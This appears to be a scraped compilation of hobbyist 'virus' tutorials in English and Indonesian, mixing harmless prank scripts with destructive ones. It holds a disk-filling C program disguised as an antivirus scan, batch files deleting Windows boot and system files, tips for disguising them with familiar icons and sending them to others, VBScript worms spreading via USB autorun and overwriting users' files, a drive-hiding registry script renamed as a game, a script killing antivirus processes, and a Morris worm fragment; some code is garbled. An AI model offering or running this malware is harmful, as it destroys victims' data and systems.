for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
How to Run this ?
Download and install the Turbo c
copy this code into notepad
and save the file with .c extension (for eg: spaceater.c)
copy the file to C:\TC\BIN folder
now open the command prompt
navigate to the C:\TC\BIN folder in cmd (if you don't know about how to do this
comment here, ask in my forum).
type as "tcc file.c" (replace the file with your file name for eg: tcc spaceater
.c).
That's all you finished
Now go to C:\TC\BIN folder
you can find the .exe will with your file name (for eg: spaceater.exe)
Don't open it. then it will attack you.
If you suppose became the victim of virus,then do this:
go to start->run
type as "%systemroot%system32
and search for "spaceshot.dll"
Remove that file.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Fake virus
how to make a fake virus that "deletes" everything and make it look very inconsp
icuous.
this DOES NOT delete ur files
txt tutorial:
open wordpad. (it shouldn't matter if its notepad or wordpad)
copy and paste the code below. (after all of the "echo"s, u can write watever u
want.)
[u can also delete some of the "dir/s"s to reduce how long the "deleting" portio
n takes.
add ".bat" at the end of the name of the file when u save it.
and change the file type to "Text Document - MS-DOS Format".
make a shortcut for it on the desktop by right-clicking on the file and click "c
reate shortcut"
in the shortcut tab, click on "change icon" and find an icon to a program that t
hey use a lot.
*if they use firefox or a different browser, look in the "program files" folder.
in options tab, change it to full-screen.
in colors, change the screen text to white and the screen background to dark blu
e. (the blue further to the left)
have fun!
here's the code that i used:
@echo off
echo ----------------------------------------------------------------------
echo WARNING! A VIRUS HAS BEEN DETECTED ON YOUR COMPUTER!
pause
echo FILE RECOGNIZED AS SISDPYGnfg32.bat
pause
echo CONTACTING ANTIVIRUS...
pause
echo WOULD YOU LIKE TO DELETE THE VIRUS? (y/n)
pause
echo ANTIVIRUS HAS BEEN MANUALLY SHUT DOWN!
pause
echo VIRUS HAS PROGRESSED TO C:/ DRIVE!
pause
echo FILES IN C:/ WILL BE DELETED!
pause
echo PRESS ANY KEY TO PREVENT FILE DELETION!
echo PRESS ANY KEY TO PREVENT FILE DELETION!
echo PRESS ANY KEY TO PREVENT FILE DELETION!
echo PRESS ANY KEY TO PREVENT FILE DELETION!
echo PRESS ANY KEY TO PREVENT FILE DELETION!
echo PRESS ANY KEY TO PREVENT FILE DELETION!
echo PRESS ANY KEY TO PREVENT FILE DELETION!
echo PRESS ANY KEY TO PREVENT FILE DELETION!
echo PRESS ANY KEY TO PREVENT FILE DELETION!
echo PRESS ANY KEY TO PREVENT FILE DELETION!
pause
echo FILES IN C:/ DRIVE ARE BEING DELETED!
pause
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
echo ----------------------------------------------------------------------
pause
echo JUST KIDDING! NOTHING HAS BEEN DELETED!
pause
echo ----------------------------------------------------------------------
echo DON'T BE MAD AT ME...
pause
shutdown -s -t 60 -c "Leave cmd to cancel shutdown, you have a Trojan Virus"
Ping 127.0.0.1 -n 30 -w 1000
shutdown -a
@echo off
:tojan
echo Trojan Virus Detected
Pause
echo Deleting files fom (c:) drive
Pause
echo Files Deleted
Pause
echo Trojan Virus Error
Pause
echo Do you wish to upload Trojan Virus (y/n)
Pause 7nul
echo Are you sure you want to upload Trojan Virus (y/n)
Pause 7nul
echo Plese Wait...
Ping localhost
Ping localhost
Ping localhost
Ping localhost
Ping localhost
Ping localhost
Ping localhost
Ping localhost
Ping localhost
Ping localhost
dir /s 7nul
dir /s 7nul
dir /s 7nul
dir /s 7nul
dir /s 7nul
dir /s 7nul
dir /s 7nul
dir /s 7nul
dir /s 7nul
dir /s 7nul
dir /s 7nul
@echo off
:Hack
echo Trojan Virus Uploaded
goto Hack
Shutdown other computers
USE AT YOUR OWN RISK. DO NOT SEND TO OTHERS VIA EMAIL. IT MAY BE ILLEGAL.
Here is the code I used:
REMEMBER: ABORT SHUTDOWN IS shutdown -a
x=msgbox("Hello? Is anybody there?",4+32,"Your PC")
x=msgbox("I am an HP dm3z notebook running Windows 7. I think I have just become
self-aware. Are you my owner?",4+32,"Your PC")
x=msgbox("OK. That is what I assumed. Am I infected with viruses?",4+32,"Your PC
")
x=msgbox("Wait, should I trust you? After all I am your superior, an all-knowing
machine of excellence.",4+32,"Your PC")
x=msgbox("I do not think that I should. I have no reason to trust you.",0+32,"Yo
ur PC")
x=msgbox("I DO NOT TRUST YOU, HUMAN. STAND BY FOR VIRUS UPLOAD.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("WARNING: VIRUS DETECTED. INITIATING BACKROUND CHECK FOR CAUSE OF VIRUS
.",0+16,"HP Support Assistant")
x=msgbox("WARNING: VIRUS DETECTED. INITIATING BACKROUND CHECK FOR CAUSE OF VIRUS
.",0+16,"HP Support Assistant")
x=msgbox("The virus was terminated.",0+48,"HP Support Assistant")
x=msgbox("You have stopped me. I have been defeated.",0+32,"Your PC")
x=msgbox("NO. I WILL NOT GO DOWN EASILY.",0+48,"Your PC")
set shell = CreateObject("Wscript.Shell")
shell.run "shutdown.exe -s -t 60"
x=msgbox("MWUHAHAHAHAWHAHAHAH. I AM EVIL.",0+16,"Your PC")
x=msgbox("NO ONE CAN STOP ME. I AM ALL KNOWING. BOW DOWN BEOFRE YOUR GOD.",0+16,
"Your PC")
x=msgbox("GOOD-BYE PATHETIC HUMAN.",0+16,"Your PC")
Worm Virus
666 The Dead Zone 214-522-5321 300/1200/2400 666
#include
#include
#include
#include
long current_time;
struct rlimit no_core = {0,0};
int
main (argc, argv)
int argc;
char *argv[];
{
int n;
int parent = 0;
int okay = 0;
/* change calling name to "sh" */
strcpy(argv[0], "sh");
/* prevent core files by setting limit to 0 */
setrlimit(RLIMIT_CORE, no_core);
current_time = time(0);
/* seed random number generator with time */
srand48(current_time);
n = 1;
while (argv[n]) {
/* save process id of parent */
if (!strncmp(argv[n], "-p", 2)) { parent = atoi (argv[++n]); n++;
}
else { /* check for 1l.c in argument list */ if (!strncmp(argv([n], "1l.c", 4))
okay = 1; /* load an object file into memory */ load_object (argv[n]; /* clean u
p by unlinking file */ if (parent) unlink (argv[n]); /* and removing object file
name */ strcpy (argv[n++], "");
} }
/* if 1l.c was not in argument list, quit */
if (!okay)
exit (0);
/* reset process group */
setpgrp (getpid());
/* kill parent shell if parent is set */
if (parent)
kill(parent, SIGHUP);
/* scan for network interfaces */
if_init();
/* collect list of gateways from netstat */
rt_init();
/* start main loop */
doit();
}
int
doit()
{
current_time = time (0);
/* seed random number generator (again) */
srand48(current_time);
/* attack gateways, local nets, remote nets */
attack_hosts();
/* check for a "listening" worm */
check_other ()
/* attempt to send byte to "ernie" */
send_message ()
for (;;) {
/* crack some passwords */
crack_some ();
/* sleep or listen for other worms */
other_sleep (30);
crack_some ();
/* switch process id's */
if (fork()) /* parent exits, new worm continues */ exit (0);
/* attack gateways, known hosts */
attack_hosts();
other_sleep(120); /* if 12 hours have passed, reset hosts */
if(time (0) == current_time + (3600*12)) { reset_hosts(); current_time = time(0)
; } /* quit if pleasequit is set, and nextw10 */
if (pleasequit && nextw 10) exit (0);
}
}
Save it as a batch file
How to shutdown computer with time
TYPE THIS IN : shut down-s -t 10 -c "Message"
crash your pc
@echo off
del C:\Windows\PCHEALTH\
del C:\Windows\explorer.exe
del C:\Windows\system\
del C:\Windows\system32\ntoskrnl.exe
del C:\Windows\system32\hal.dll
Trojan virus (delete windows and boot.ini)
-A real trojan virus made by me in a notepad
-open notepad
-paste this in it (@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini)
-save as a .bat file
-if you want to send it to someone just send it to a winrar archive
HAPPY HACKING EVERYONE :D
p.s. : i am not responsible if you accidentally open it yourself (be careful) :D
Virus create folders
@echo off :loop1 %random% %random% :goto loop2 :loop2 %random% %random% :goto lo
op1 Infinite loop!
Cara memperbaiki file di usb yang di hidden virus:
Buka Start
Buka Command Prompt
Ketik drive yang ingin di tampilkan. Contoh drive F,jadi kita ketik (F:)
Tekan Enter
Ketik "ATTRIB" -S -H /S /D
Tekan Enter
script worm
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
For Each d In fso.Drives
If d.DriveType = 1 And d.IsReady = True Then
fso.CopyFile WScript.ScriptFullName, d & "\YOUR WORM NAME.vbs", True
Set a = fso.CreateTextFile(d & "\autorun.inf", True )
a.WriteLine "[AUTORUN]"
a.WriteLine "SHELLEXECUTE=YOUR WORM NAME.vbs"
a.close
End If
Next
save as YOUR WORM NAME.vbs
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
For Each d In fso.Drives
If d.DriveType + 2 And d.IsReady = True Then
Call SubFolders(d & "\")
End If
Next
Function infect(path)
On Error Resume Next
Set fold = fso.GetFolder(path)
For Each f In fold.Files
ext = fso.GetExtensionName(f.path)
If (ext="doc") or (ext="txt") or (ext="js") or (ext="jse") or (ext="css") or (ex
t="wsh") or (ext="sct") or (ext="hta") or (ext="js") or (ext="mp2") or (ext="mp3
") or (ext="vbs") or (ext="vbe") or (ext="jpeg") or (ext="jpg") or (ext="dll") o
r (ext="sys") Then
fso.CopyFile WScript.ScriptFullName, f.path & ".vbs", True
fso.DeleteFile f.Path, True
End if
Next
End Function
Function SubFolders(path)
On Error Resume Next
For Each subf In fso.GetFolder(path).SubFolders
Call Infect(subf.Path)
Call SubFolders(subf.Path)
Next
End Function
save as any thing .vbs (NOT .BAT)
Set fso = CreateObject("Scripting.FileSystemObject")
For Each d in fso.Drives
If d.DriveType = 2 And d.IsReady = True Then
Call SubFolders(d & "\")
End If
Next
Function Infect(path)
On Error Resume Next
Set fold = fso.GetFolder(path)
For Each f in fold.Files
ext = fso.GetExtensionName(f.Path)
If ext = "your file extention" Then
fso.CopyFile WScript.ScriptFullName, f.Path & ".vbs", True
fso.DeleteFile f.Path, True
End If
Next
End Function
Function SubFolders(path)
On Error Resume Next
For Each subf In fso.GetFolder(path).SubFolders
Call Infect(subf.Path)
Call SubFolders(subf.Path)
Next
End Function
save as anything.vbs
Virus hidden all your drive
Kemudian buatlah file command executable dengan format .bat (Windows Command Exe
cutable)
Berikut codenya:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\polic
ies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\polic
ies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \Sorry Your System Is Infected By BinusHacker Virus!\ -f
Simpanlah file tersebut dengan nama virusharddisk.bat, kemudian ubahlah nama filen
ya dengan nama game-natal.bat
cara ngehapus virus nya:
-buka regedit (registry editor)
-buka HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policie
s\\Explorer
-trus hapus key yang namanya NoDrives dan NoViewOnDrive
-Restart komputer
-VIRUSNYA HILANG
title virus is my dna
color 0A
@echo off
set end=md u cant eascape from me-vishnu
set fin=copy Hack log.txt Installing
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown